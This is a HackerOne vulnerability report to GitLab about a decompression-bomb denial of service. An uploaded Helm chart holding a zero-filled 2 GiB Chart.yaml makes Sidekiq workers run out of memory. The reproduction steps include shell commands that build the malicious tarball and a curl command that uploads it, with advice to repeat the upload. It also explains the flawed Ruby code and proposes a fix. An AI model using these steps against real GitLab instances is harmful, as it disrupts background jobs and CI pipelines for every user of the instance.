Sidekiq background job DoS by uploading a malicious Helm package
HackerOne report #1766973 by luryus
on 2022-11-08, assigned to GitLab Team
Report
Summary
An attacker can upload a crafted tarball to a Helm package repository in a GitLab project and cause Sidekiq to use excessive memory and crash (get killed by the Linux OOM killer). This is essentially a trivial zip-bomb attack.
In small (self-hosted) GitLab environments with only a single Sidekiq node, this causes some background jobs to fail or be delayed. For instance, the CI pipelines of other users may get interrupted. In other words, this can cause a minor denial of service.
When a Helm chart (package) file (a .tar.gz) is uploaded, GitLab extracts its metadata in a Sidekiq background job by reading the Chart.yaml file inside the tarball. This process lacks sufficient size checks for the files. The attacker can make Chart.yaml a zero-filled 2 GiB file (more specifically 2147483647 bytes), which compresses to approximately 2 megabytes when gzipped. This is well under the default Helm chart file limit of 5 megabytes [1]. The Sidekiq job will try to read the whole 2 GiB into memory, which can push it over its memory limits.
Because the attacker only needs to upload a single small file (a few megabytes) to achieve this, it is difficult or impossible to mitigate with rate limits. The attack can be repeated as frequently as the attacker can upload packages, so the attacker can cause crashes continuously.
Compared to my previous reports (#1716296 and #1736230), where similar issues exist in NuGet package uploads and CI job parsing, this one is more limited because of a limitation in Ruby's Zlib: trying to read more than 2147483647 bytes at a time just raises an exception, so memory use beyond that cannot be achieved. However, that limit is still enough to crash a typical Sidekiq instance; for example, gitlab.com appears to set the "catchall" Sidekiq node memory limit to 2.5 GB [2], which is not enough headroom if any other jobs are running on the same node. The attacker can of course upload many Helm packages concurrently to cause even more memory use if a single 2 GiB file does not cause a crash.
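For reference, the compression ratio behind this can be reproduced with a short Ruby sketch (illustrative code, not part of GitLab): DEFLATE compresses long runs of zeros at roughly 1000:1, so gzipping 2147483647 zero bytes yields output of around 2 MB, comfortably below the 5 MB chart limit.

require 'zlib'
require 'stringio'

SIZE  = 2_147_483_647        # 2**31 - 1 bytes, the same size as the crafted Chart.yaml
CHUNK = 16 * 1024 * 1024     # compress in 16 MiB chunks to keep memory use low

out = StringIO.new
gz  = Zlib::GzipWriter.new(out)
remaining = SIZE
while remaining > 0
  n = [CHUNK, remaining].min
  gz.write("\0" * n)
  remaining -= n
end
gz.finish                    # finish the gzip stream without closing the StringIO

puts "uncompressed: #{SIZE} bytes"
puts "compressed:   #{out.size} bytes"   # roughly 2 MB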
Steps to reproduce
- Ensure that the Helm package repository is enabled in the GitLab instance
- Create a personal access token, if you do not already have one
- Create a new personal project.
- Craft a malicious Helm package or download the one that's attached to this report.
  mkdir test
  touch test/Chart.yaml
  fallocate -l 2147483647 test/Chart.yaml
  tar czvf test-chart.tgz test/Chart.yaml
- Monitor the Sidekiq processes in the GitLab instance with, for example, these tools:
  - htop for general system memory usage and processes
  - tail -f path/to/sidekiq/logs for monitoring Sidekiq's activity (the exact log file path depends on the installation)
  - dmesg -T -w for kernel logs (OOMKill messages end up here)
- Upload the package using curl. Change the variables according to your test environment. You can run the curl command a few times in quick succession.
  TOKEN="<your personal access token>"
  USERNAME="<your username>"
  PROJECT_ID="<your project id>"
  GITLAB_URL="<http://your-gitlab-address>"

  curl -X POST --form 'chart=@test-chart.tgz' --user "${USERNAME}:${TOKEN}" "${GITLAB_URL}/api/v4/projects/${PROJECT_ID}/packages/helm/api/stable/charts"
- Observe Sidekiq crashes due to OOMKills in Gitlab server logs
Impact
An attacker can get a sidekiq worker OOMKilled by a simple package file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.
This can affect any user in the Gitlab instance because much of Gitlab's functionality relies on sidekiq jobs. For instance, this may cause a CI pipeline to fail and be left in a "pending" state for a long time, if a background job for that pipeline was running when sidekiq crashed.
Examples
An example file, test-chart.tgz, that causes the issue is attached.
I have also attached a demo video in which I reproduce this on my own GitLab instance. In the video, some logs and monitoring tools are shown, in addition to the package upload commands that trigger the issue.
What is the current bug behavior?
When GitLab processes the newly uploaded Helm package, the Sidekiq job execution ends up in Packages::Helm::ExtractFileMetadataService.chart_yaml_content. That function goes through the file entries in the package tarball, looking for Chart.yaml. When it is found, the code proceeds to read the entire file into memory with chart_yaml.read. No length limit parameter is given to read, so it tries to read the file to the end.
There actually is a limit here, due to a bug / unintended behaviour in Zlib::GzipReader: if the Chart.yaml file is larger than 2147483647 bytes, the read call raises an error. TarReader requests the entire file size from GzipReader, which then tries to convert the requested size to an int in C code; that conversion fails for larger values. If that limitation were not present, the attacker could trigger even higher memory usage here.
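For reference, here is a simplified Ruby sketch of the vulnerable pattern described above (an approximation, not the actual GitLab source; the file-matching check in particular is illustrative):

require 'zlib'
require 'rubygems/package'

# Approximation of Packages::Helm::ExtractFileMetadataService.chart_yaml_content;
# the real service differs in details, but the unbounded read is the key point.
def chart_yaml_content(tgz_path)
  File.open(tgz_path, 'rb') do |file|
    gz = Zlib::GzipReader.new(file)
    Gem::Package::TarReader.new(gz) do |tar|
      tar.each do |entry|
        next unless entry.full_name.end_with?('Chart.yaml')
        # No length argument: TarReader::Entry#read asks GzipReader for the
        # entire uncompressed entry, so a 2 GiB Chart.yaml lands in memory.
        return entry.read
      end
    end
  end
end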
What is the expected correct behavior?
The code should limit the amount of data read from the Helm Chart.yaml file. A typical Chart.yaml file is at most a few kilobytes, and its size should never exceed a few megabytes.
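A hedged sketch of one possible fix follows; the constant, method name, and error class are illustrative, not GitLab's. The idea is to reject oversized entries based on the size recorded in the tar header and to cap the read length regardless:

MAX_CHART_YAML_SIZE = 2 * 1024 * 1024  # illustrative limit; a real Chart.yaml is tiny

class ChartYamlTooLargeError < StandardError; end

def read_chart_yaml(entry)
  # entry.size comes from the tar header, so it is known before any data is read
  raise ChartYamlTooLargeError if entry.size > MAX_CHART_YAML_SIZE

  # passing a length to Entry#read caps the allocation regardless of the header
  entry.read(MAX_CHART_YAML_SIZE)
end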
Relevant logs and/or screenshots
See the attached video file, it includes logs.
Output of checks
Not tested on Gitlab.com, but this can have at least some effect there.
Results of GitLab environment info
Docker installation:
### gitlab-rake gitlab:env:info
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version:6.4.2
Go Version: unknown
GitLab information
Version: 15.5.2-ee
Revision: 767831e030c
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: http://gl.lkoskela.com:8929
HTTP Clone URL: http://gl.lkoskela.com:8929/some-group/some-project.git
SSH Clone URL: ssh://git@gl.lkoskela.com:2224/some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.12.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
[1] https://docs.gitlab.com/ee/administration/instance_limits.html#file-size-limits
[2] https://gitlab.com/gitlab-com/gl-infra/k8s-workloads/gitlab-com/-/blob/master/releases/gitlab/values/gprd.yaml.gotmpl#L547
Impact
An attacker can get a sidekiq worker OOMKilled by a simple file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.
The severity depends on the Sidekiq setup: on larger, more distributed instances the impact is of course smaller, as crashes are limited to a subset of Sidekiq instances. In small self-hosted environments, though, this can have a large impact on GitLab's functionality.
This can affect any user of the GitLab instance because much of GitLab's functionality relies on Sidekiq jobs. Background job execution may get delayed, or in some cases jobs may not get executed at all (if the attacker can keep Sidekiq crashing continuously). For instance, this may cause a CI pipeline to fail and be left in a "pending" state for a long time, if a background job for that pipeline was running when Sidekiq crashed.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!